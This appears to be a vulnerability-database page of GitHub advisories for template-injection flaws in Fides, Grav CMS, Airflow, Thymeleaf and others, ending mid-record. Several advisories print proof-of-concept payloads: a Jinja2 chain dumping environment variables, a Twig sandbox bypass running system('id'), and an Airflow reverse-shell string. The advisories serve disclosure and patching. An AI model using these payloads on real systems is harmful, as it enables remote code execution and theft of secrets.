Common Weakness Enumeration

CWE-1336

Allowed

Improper Neutralization of Special Elements Used in a Template Engine

Abstraction: Base · Status: Incomplete

The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine.

313 vulnerabilities reference this CWE, most recent first.

GHSA-9XXF-6JW5-HPJG

Vulnerability from github – Published: 2025-11-28 00:30 – Updated: 2025-12-03 21:31
VLAI
Details

An issue was discovered in Logpoint before 7.7.0. Sensitive information is exposed in System Processes for an extended period during high CPU load.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-66361"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-28T00:15:46Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in Logpoint before 7.7.0. Sensitive information is exposed in System Processes for an extended period during high CPU load.",
  "id": "GHSA-9xxf-6jw5-hpjg",
  "modified": "2025-12-03T21:31:02Z",
  "published": "2025-11-28T00:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66361"
    },
    {
      "type": "WEB",
      "url": "https://servicedesk.logpoint.com/hc/en-us/articles/29160993806749-Process-Data-Exposure-Under-High-Load"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-C34R-238X-F7QX

Vulnerability from github – Published: 2024-09-04 18:07 – Updated: 2024-11-18 16:27
VLAI
Summary
Remote Code Execution Vulnerability via SSTI in Fides Webserver Jinja Email Templating Engine
Details

Summary

The Email Templating feature uses Jinja2 without proper input sanitization or rendering environment restrictions, allowing for Server-Side Template Injection that grants Remote Code Execution to privileged users. A privileged user refers to an Admin UI user with the default Owner or Contributor role, who can escalate their access and execute code on the underlying Fides Webserver container where the Jinja template rendering function is executed.

Details

The application enables the creation of message templates that are sent via email to Fides Privacy Center users (data subjects) who raise privacy requests such as data subject access requests or consent management requests via the Privacy Center. These emails are triggered at various points in the request processing flow, for example when a request is denied or approved. The messages are defined using Jinja2 templates, allowing the use of statement and expression directives to craft more complex messages that include dynamic variables.

It was discovered that the Jinja2 environment used to render the templates does not restrict the usage of common Python methods and objects, which permits an attacker to execute arbitrary code via Server-Side Template Injection. An attacker with the ability to modify email templates can inject malicious code, which is then executed when an email message is rendered and sent to the user.

Admin UI users assigned the following default roles are permitted to modify email templates and are therefore able to exploit this vulnerability: - Owner - Contributor

OAuth clients with the messaging-template:update scope are also authorized to use the PUT /api/v1/messaging/templates/ Fides Webserver API endpoint and may also exploit this vulnerability.

Impact

This vulnerability allows an attacker with sufficient privileges (Owner, Contributor, messaging-template:update) to execute arbitrary code remotely (Remote Code Execution) and escalate their privileges to those of a user on the Fides Webserver container. This escalated access grants the attacker control of the Fides Webserver application, including unauthorized access to integrated resources such as the hosted database, hosted cache, integrated data stores, and integrated SaaS applications. Potential impacts range from denial of service to the exfiltration of sensitive data unavailable to the user prior to the escalation of access.

Patches

The vulnerability has been patched in Fides version 2.44.0. Users are advised to upgrade to this version or later to secure their systems against this threat.

Workarounds

There are no workarounds.

PoC

The following payload, when injected into the email template, enables the execution of a command on the underlying system, revealing the content of environment variables:

Your privacy request has been denied.
*bb*
{% for s in ().__class__.__base__.__subclasses__() %}{% if "warning" in s.__name__ %}{{s()._module.__builtins__['__import__']('os').popen("env").read() }}{% endif %}
{% endfor %}
*aa*

The following HTTP request to the Fides Webserver API can be used to update a privacy request denial email template:

PUT /api/v1/messaging/templates/autogenerated-mes_ce649254-a90b-4073-ae12-193650064220 HTTP/2
Host: <redacted host>
Cookie: _fbp=fb.1.17232<..REDACTED>_ga=GA1.1.263756963.1723471626
Content-Length: 361
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
Unescape-Safestr: true
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU..<REDACTED>
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/json
Access-Control-Allow-Origin: *
X-Fides-Source: fidesops-admin-ui
Sec-Ch-Ua-Platform: "Linux"
Accept: */*
Origin: https://<redacted host>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<redacted host>/messaging/autogenerated-mes_ce649254-a90b-4073-ae12-193650064220
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

{
    "is_enabled": true,
    "content":
    {
        "subject": "Your privacy request has been denied XXX",
        "body": "Your privacy request has been denied. \n*bb*\n{% for s in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in s.__name__ %}{{s()._module.__builtins__['__import__']('os').popen(\"env\").read() }}{% endif %}\n{% endfor %}\n*aa*\n**"
    },
    "properties":
    [
        "FDS-JICO87"
    ]
}

As a result, when a Privacy Center user submits a privacy request, such as to access their own data, and the request is rejected by a user of the privacy request management dashboard, the malicious template will be rendered, the code will be executed, and the content of the underlying container's environment variables will be included in the email the end-user receives.

rce-email

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "ethyca-fides"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.19.0"
            },
            {
              "fixed": "2.44.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-45053"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-09-04T18:07:17Z",
    "nvd_published_at": "2024-09-04T16:15:07Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe Email Templating feature uses Jinja2 without proper input sanitization or rendering environment restrictions, allowing for Server-Side Template Injection that grants Remote Code Execution to privileged users. A privileged user refers to an Admin UI user with the default `Owner` or `Contributor` role, who can escalate their access and execute code on the underlying Fides Webserver container where the Jinja template rendering function is executed.\n\n### Details\nThe application enables the creation of message templates that are sent via email to Fides Privacy Center users (data subjects) who raise privacy requests such as data subject access requests or consent management requests via the Privacy Center. These emails are triggered at various points in the request processing flow, for example when a request is denied or approved. The messages are defined using Jinja2 templates, allowing the use of statement and expression directives to craft more complex messages that include dynamic variables.\n\nIt was discovered that the Jinja2 environment used to render the templates does not restrict the usage of common Python methods and objects, which permits an attacker to execute arbitrary code via Server-Side Template Injection. An attacker with the ability to modify email templates can inject malicious code, which is then executed when an email message is rendered and sent to the user.\n\nAdmin UI users assigned the following default roles are permitted to modify email templates and are therefore able to exploit this vulnerability:\n- Owner\n- Contributor\n\nOAuth clients with the `messaging-template:update` scope are also authorized to use the `PUT /api/v1/messaging/templates/` Fides Webserver API endpoint and may also exploit this vulnerability.\n\n### Impact\nThis vulnerability allows an attacker with sufficient privileges (`Owner`, `Contributor`, `messaging-template:update`) to execute arbitrary code remotely (Remote Code Execution) and escalate their privileges to those of a user on the Fides Webserver container. This escalated access grants the attacker control of the Fides Webserver application, including unauthorized access to integrated resources such as the hosted database, hosted cache, integrated data stores, and integrated SaaS applications. Potential impacts range from denial of service to the exfiltration of sensitive data unavailable to the user prior to the escalation of access.\n\n### Patches\nThe vulnerability has been patched in Fides version `2.44.0`. Users are advised to upgrade to this version or later to secure their systems against this threat.\n\n### Workarounds\nThere are no workarounds.\n\n### PoC\nThe following payload, when injected into the email template, enables the execution of a command on the underlying system, revealing the content of environment variables:\n```jinja\nYour privacy request has been denied.\n*bb*\n{% for s in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in s.__name__ %}{{s()._module.__builtins__[\u0027__import__\u0027](\u0027os\u0027).popen(\"env\").read() }}{% endif %}\n{% endfor %}\n*aa*\n```\n\nThe following HTTP request to the Fides Webserver API can be used to update a privacy request denial email template:\n```http\nPUT /api/v1/messaging/templates/autogenerated-mes_ce649254-a90b-4073-ae12-193650064220 HTTP/2\nHost: \u003credacted host\u003e\nCookie: _fbp=fb.1.17232\u003c..REDACTED\u003e_ga=GA1.1.263756963.1723471626\nContent-Length: 361\nSec-Ch-Ua: \"Not/A)Brand\";v=\"8\", \"Chromium\";v=\"126\", \"Google Chrome\";v=\"126\"\nUnescape-Safestr: true\nSec-Ch-Ua-Mobile: ?0\nAuthorization: Bearer eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU..\u003cREDACTED\u003e\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\nContent-Type: application/json\nAccess-Control-Allow-Origin: *\nX-Fides-Source: fidesops-admin-ui\nSec-Ch-Ua-Platform: \"Linux\"\nAccept: */*\nOrigin: https://\u003credacted host\u003e\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https://\u003credacted host\u003e/messaging/autogenerated-mes_ce649254-a90b-4073-ae12-193650064220\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-US,en;q=0.9\nPriority: u=1, i\n\n{\n    \"is_enabled\": true,\n    \"content\":\n    {\n        \"subject\": \"Your privacy request has been denied XXX\",\n        \"body\": \"Your privacy request has been denied. \\n*bb*\\n{% for s in ().__class__.__base__.__subclasses__() %}{% if \\\"warning\\\" in s.__name__ %}{{s()._module.__builtins__[\u0027__import__\u0027](\u0027os\u0027).popen(\\\"env\\\").read() }}{% endif %}\\n{% endfor %}\\n*aa*\\n**\"\n    },\n    \"properties\":\n    [\n        \"FDS-JICO87\"\n    ]\n}\n```\n\nAs a result, when a Privacy Center user submits a privacy request, such as to access their own data, and the request is rejected by a user of the privacy request management dashboard, the malicious template will be rendered, the code will be executed, and the content of the underlying container\u0027s environment variables will be included in the email the end-user receives.\n\n\u003cimg width=\"851\" alt=\"rce-email\" src=\"https://github.com/user-attachments/assets/97a395c6-b163-4656-b551-fe3dcd748813\"\u003e\n\n",
  "id": "GHSA-c34r-238x-f7qx",
  "modified": "2024-11-18T16:27:09Z",
  "published": "2024-09-04T18:07:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ethyca/fides/security/advisories/GHSA-c34r-238x-f7qx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45053"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ethyca/fides/commit/829cbd9cb5ef9c814fbac1ed6800e8d939d359c5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ethyca/fides"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Remote Code Execution Vulnerability via SSTI in Fides Webserver Jinja Email Templating Engine"
}

GHSA-C85C-G9WV-PPH2

Vulnerability from github – Published: 2026-06-01 09:31 – Updated: 2026-07-09 20:52
VLAI
Summary
Apache Airflow vulnerable to Improper Neutralization of Special Elements Used in a Template Engine
Details

Apache Airflow's official documentation at core-concepts/dag-run.html ("Passing Parameters when triggering Dags") showed a verbatim BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}") example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had Dag.can_trigger permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the conf field of the trigger API: an authenticated trigger user could supply "; bash -i >& /dev/tcp/.../9999 0>&1; #" as a conf value and reach an os.exec on the worker. This CVE covers the documentation correction in apache/airflow PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to apache-airflow 3.2.2 or later to pick up the corrected documentation shipped with the release.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "apache-airflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42252"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-09T20:52:34Z",
    "nvd_published_at": "2026-06-01T09:16:18Z",
    "severity": "CRITICAL"
  },
  "details": "Apache Airflow\u0027s official documentation at `core-concepts/dag-run.html` (\"Passing Parameters when triggering Dags\") showed a verbatim `BashOperator(bash_command=\"echo value: {{ dag_run.conf[\u0027conf1\u0027] }}\")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `\"; bash -i \u003e\u0026 /dev/tcp/.../9999 0\u003e\u00261; #\"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 \u2014 the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.",
  "id": "GHSA-c85c-g9wv-pph2",
  "modified": "2026-07-09T20:52:34Z",
  "published": "2026-06-01T09:31:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42252"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/airflow/pull/64129"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/airflow"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-184.yaml"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/8f4sc0rfn154jprmnwtmlst4p9zfw3w7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apache Airflow vulnerable to Improper Neutralization of Special Elements Used in a Template Engine"
}

GHSA-C9GP-64C4-2RRH

Vulnerability from github – Published: 2024-03-22 16:30 – Updated: 2024-03-22 16:30
VLAI
Summary
Server-Side Template Injection (SSTI) with Grav CMS security sandbox bypass
Details

Summary

Grav CMS is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox.

Details

The Grav CMS implements a custom sandbox to protect the powerful Twig methods "registerUndefinedFunctionCallback()" and "registerUndefinedFilterCallback()", in order to avoid SSTI attacks by denying the calling of dangerous PHP functions into the Twig template directives (such as: "exec()", "passthru()", "system()", etc.). The current defenses are based on a blacklist of prohibited functions (PHP, Twig), checked through the "isDangerousFunction()" method called in the file "system/src/Grav/Common/Twig.php":

...
$this->twig = new TwigEnvironment($loader_chain, $params);

$this->twig->registerUndefinedFunctionCallback(function (string $name) use ($config) {
    $allowed = $config->get('system.twig.safe_functions');
    if (is_array($allowed) && in_array($name, $allowed, true) && function_exists($name)) {
        return new TwigFunction($name, $name);
    }
    if ($config->get('system.twig.undefined_functions')) {
        if (function_exists($name)) {
            if (!Utils::isDangerousFunction($name)) {
                user_error("PHP function {$name}() was used as Twig function. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_functions`", E_USER_DEPRECATED);

                return new TwigFunction($name, $name);
            }

           /** @var Debugger $debugger */
           $debugger = $this->grav['debugger'];
           $debugger->addException(new RuntimeException("Blocked potentially dangerous PHP function {$name}() being used as Twig function. If you really want to use it, please add it to system configuration: `system.twig.safe_functions`"));
        }

        return new TwigFunction($name, static function () {});
    }

    return false;
});

$this->twig->registerUndefinedFilterCallback(function (string $name) use ($config) {
    $allowed = $config->get('system.twig.safe_filters');
    if (is_array($allowed) && in_array($name, $allowed, true) && function_exists($name)) {
        return new TwigFilter($name, $name);
    }
    if ($config->get('system.twig.undefined_filters')) {
        if (function_exists($name)) {
            if (!Utils::isDangerousFunction($name)) {
                user_error("PHP function {$name}() used as Twig filter. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_filters`", E_USER_DEPRECATED);
                return new TwigFilter($name, $name);
            }
...

In the code above it can be seen that the calls of the "isDangerousFunction()" are not performed when the method/filter in the "$name" variable has been considered safe. A function can be defined safe only by an administrator user, by adding it into the configuration properties "system.twig.safe_functions" and/or "system.twig.safe_filters" (a sort of whitelists that by default are empty) of the configuration file "system/config/system.yaml".

It is to note that within the "system/src/Grav/Common/Twig.php" file a Twig class is defined (with its constructor, methods and attributes) and in particular the Twig object (and environment) is instantiated on it:

/**
 * Class Twig
 * @package Grav\Common\Twig
 */
class Twig
{
    /** @var Environment */
    public $twig;
    /** @var array */
    public $twig_vars = [];
    /** @var array */
    public $twig_paths;
    /** @var string */
    public $template;
...
   /**
     * Constructor
     *
     * @param Grav $grav
     */
    public function __construct(Grav $grav)
    {
        $this->grav = $grav;
        $this->twig_paths = [];
    }

    /**
     * Twig initialization that sets the twig loader chain, then the environment, then extensions
     * and also the base set of twig vars
     *
     * @return $this
     */
    public function init()
    {
        if (null === $this->twig) {
            /** @var Config $config */
            $config = $this->grav['config'];
...

Since the security sandbox does not protect the Twig object it is possible to interact with it (e.g. call its methods, read/write its attributes) through opportunely crafted Twig template directives injected on a web page. Then an authenticated editor user could be able to add arbitrary functions into the Twig attributes "system.twig.safe_functions" and "system.twig.safe_filters" in order to circumvent the Grav CMS sandbox.

PoC

An authenticated user with the permissions to edit a page (having Twig processing enabled) on the Grav CMS admin console, could create/edit a web page containing a malicious template directive to execute arbitrary OS commands on the remote web server. For instance, in order to abuse the vulnerability and execute the prohibited "system('id')" code, bypassing the sandbox, the editor could generate a web page containing the following template directives:

{% set arr = {'1':'system', '2':'foo'} %}
{{ var_dump(grav.twig.twig_vars['config'].set('system.twig.safe_functions', arr)) }}
{{ system('id') }}

Once saved the malicious page could be accessed by unauthenticated users to execute the "system('id')" code on the remote server hosting the vulnerable Grav CMS.

Impact

It is possible to execute remote code on the underlying server and compromise it.

Tested version

Grav CMS v1.7.43

Reported by

Maurizio Siddu

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "getgrav/grav"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.45"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-28116"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-22T16:30:26Z",
    "nvd_published_at": "2024-03-21T22:15:11Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nGrav CMS is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox.\n\n### Details\nThe Grav CMS implements a custom sandbox to protect the powerful Twig methods \"registerUndefinedFunctionCallback()\" and \"registerUndefinedFilterCallback()\", in order to avoid SSTI attacks by denying the calling of dangerous PHP functions into the Twig template directives (such as: \"exec()\", \"passthru()\", \"system()\", etc.). \nThe current defenses are based on a blacklist of prohibited functions (PHP, Twig), checked through the \"isDangerousFunction()\" method called in the file \"system/src/Grav/Common/Twig.php\":\n\n```php\n...\n$this-\u003etwig = new TwigEnvironment($loader_chain, $params);\n\n$this-\u003etwig-\u003eregisterUndefinedFunctionCallback(function (string $name) use ($config) {\n    $allowed = $config-\u003eget(\u0027system.twig.safe_functions\u0027);\n    if (is_array($allowed) \u0026\u0026 in_array($name, $allowed, true) \u0026\u0026 function_exists($name)) {\n        return new TwigFunction($name, $name);\n    }\n    if ($config-\u003eget(\u0027system.twig.undefined_functions\u0027)) {\n        if (function_exists($name)) {\n            if (!Utils::isDangerousFunction($name)) {\n                user_error(\"PHP function {$name}() was used as Twig function. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_functions`\", E_USER_DEPRECATED);\n\n                return new TwigFunction($name, $name);\n            }\n\n           /** @var Debugger $debugger */\n           $debugger = $this-\u003egrav[\u0027debugger\u0027];\n           $debugger-\u003eaddException(new RuntimeException(\"Blocked potentially dangerous PHP function {$name}() being used as Twig function. If you really want to use it, please add it to system configuration: `system.twig.safe_functions`\"));\n        }\n\n        return new TwigFunction($name, static function () {});\n    }\n\n    return false;\n});\n\n$this-\u003etwig-\u003eregisterUndefinedFilterCallback(function (string $name) use ($config) {\n    $allowed = $config-\u003eget(\u0027system.twig.safe_filters\u0027);\n    if (is_array($allowed) \u0026\u0026 in_array($name, $allowed, true) \u0026\u0026 function_exists($name)) {\n        return new TwigFilter($name, $name);\n    }\n    if ($config-\u003eget(\u0027system.twig.undefined_filters\u0027)) {\n        if (function_exists($name)) {\n            if (!Utils::isDangerousFunction($name)) {\n                user_error(\"PHP function {$name}() used as Twig filter. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_filters`\", E_USER_DEPRECATED);\n                return new TwigFilter($name, $name);\n            }\n...\n```\nIn the code above it can be seen that the calls of the \"isDangerousFunction()\" are not performed when the method/filter in the \"$name\" variable has been considered safe. A function can be defined safe only by an administrator user, by adding it into the configuration properties \"system.twig.safe_functions\" and/or \"system.twig.safe_filters\" (a sort of whitelists that by default are empty) of the configuration file \"system/config/system.yaml\".\n\nIt is to note that within the \"system/src/Grav/Common/Twig.php\" file a Twig class is defined (with its constructor, methods and attributes) and in particular the Twig object (and environment) is instantiated on it:\n```php\n/**\n * Class Twig\n * @package Grav\\Common\\Twig\n */\nclass Twig\n{\n    /** @var Environment */\n    public $twig;\n    /** @var array */\n    public $twig_vars = [];\n    /** @var array */\n    public $twig_paths;\n    /** @var string */\n    public $template;\n...\n   /**\n     * Constructor\n     *\n     * @param Grav $grav\n     */\n    public function __construct(Grav $grav)\n    {\n        $this-\u003egrav = $grav;\n        $this-\u003etwig_paths = [];\n    }\n\n    /**\n     * Twig initialization that sets the twig loader chain, then the environment, then extensions\n     * and also the base set of twig vars\n     *\n     * @return $this\n     */\n    public function init()\n    {\n        if (null === $this-\u003etwig) {\n            /** @var Config $config */\n            $config = $this-\u003egrav[\u0027config\u0027];\n...\n```\nSince the security sandbox does not protect the Twig object it is possible to interact with it (e.g. call its methods, read/write its attributes) through opportunely crafted Twig template directives injected on a web page. \nThen an authenticated editor user could be able to add arbitrary functions into the Twig attributes \"system.twig.safe_functions\" and \"system.twig.safe_filters\" in order to circumvent the Grav CMS sandbox.\n\n\n### PoC\nAn authenticated user with the permissions to edit a page (having Twig processing enabled) on the Grav CMS admin console, could create/edit a web page containing a malicious template directive to execute arbitrary OS commands on the remote web server.\nFor instance, in order to abuse the vulnerability and execute the prohibited \"system(\u0027id\u0027)\" code, bypassing the sandbox, the editor could generate a web page containing the following template directives:\n```\n{% set arr = {\u00271\u0027:\u0027system\u0027, \u00272\u0027:\u0027foo\u0027} %}\n{{ var_dump(grav.twig.twig_vars[\u0027config\u0027].set(\u0027system.twig.safe_functions\u0027, arr)) }}\n{{ system(\u0027id\u0027) }}\n```\nOnce saved the malicious page could be accessed by unauthenticated users to execute the \"system(\u0027id\u0027)\" code on the remote server hosting the vulnerable Grav CMS.\n\n\n### Impact\nIt is possible to execute remote code on the underlying server and compromise it.\n\n\n### Tested version\nGrav CMS v1.7.43\n\n\n### Reported by\nMaurizio Siddu",
  "id": "GHSA-c9gp-64c4-2rrh",
  "modified": "2024-03-22T16:30:26Z",
  "published": "2024-03-22T16:30:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28116"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/getgrav/grav"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Server-Side Template Injection (SSTI) with Grav CMS security sandbox bypass"
}

GHSA-C9PH-GXWW-7744

Vulnerability from github – Published: 2026-05-04 21:15 – Updated: 2026-05-13 16:43
VLAI
Summary
Sandboxed Thymeleaf expressions vulnerable to improper recognition of unauthorized syntax patterns
Details

Impact

A security bypass vulnerability exists in the expression execution mechanisms of Thymeleaf up to and including 3.1.4.RELEASE. Although the library provides mechanisms to avoid the execution of potentially dangerous expressions in some specific sandboxed (restricted) contexts, it fails to properly neutralize specific constructs that allow this kind of expressions to be executed. If an application developer passes to the template engine unsanitized variables that contain such expressions, and these values are used in sandboxed contexts inside the templates, these expressions can be executed achieving Server-Side Template Injection (SSTI).

Patches

This has been fixed in Thymeleaf 3.1.5.RELEASE. All users are advised to upgrade immediately.

Workarounds

No workaround is available beyond ensuring applications do not pass unvalidated/unsanitized data directly to the template engine. Upgrading to 3.1.5.RELEASE is strongly recommended in any case.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.4.RELEASE"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.thymeleaf:thymeleaf"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.5.RELEASE"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.4.RELEASE"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.thymeleaf:thymeleaf-spring5"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.5.RELEASE"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.4.RELEASE"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.thymeleaf:thymeleaf-spring6"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.5.RELEASE"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41901"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336",
      "CWE-917"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T21:15:20Z",
    "nvd_published_at": "2026-05-12T23:16:17Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nA security bypass vulnerability exists in the expression execution mechanisms of Thymeleaf up to and including 3.1.4.RELEASE. Although the library provides mechanisms to avoid the execution of potentially dangerous expressions in some specific sandboxed (restricted) contexts, it fails to properly neutralize specific constructs that allow this kind of expressions to be executed. If an application developer passes to the template engine unsanitized variables that contain such expressions, and these values are used in sandboxed contexts inside the templates, these expressions can be executed achieving Server-Side Template Injection (SSTI).\n\n### Patches\n\nThis has been fixed in Thymeleaf 3.1.5.RELEASE. All users are advised to upgrade immediately.\n\n### Workarounds\n\nNo workaround is available beyond ensuring applications do not pass unvalidated/unsanitized data directly to the template engine. Upgrading to 3.1.5.RELEASE is strongly recommended in any case.",
  "id": "GHSA-c9ph-gxww-7744",
  "modified": "2026-05-13T16:43:36Z",
  "published": "2026-05-04T21:15:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/thymeleaf/thymeleaf/security/advisories/GHSA-c9ph-gxww-7744"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41901"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/thymeleaf/thymeleaf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Sandboxed Thymeleaf expressions vulnerable to improper recognition of unauthorized syntax patterns"
}

GHSA-CJJC-MF84-XP9F

Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-20 12:32
VLAI
Details

AutoGPT versions 0.3.4 and earlier are vulnerable to a Server-Side Template Injection (SSTI) that could lead to Remote Code Execution (RCE). The vulnerability arises from the improper handling of user-supplied format strings in the AgentOutputBlock implementation, where malicious input is passed to the Jinja2 templating engine without adequate security measures. Attackers can exploit this flaw to execute arbitrary commands on the host system. The issue is fixed in version 0.4.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-1040"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336",
      "CWE-77"
    ],
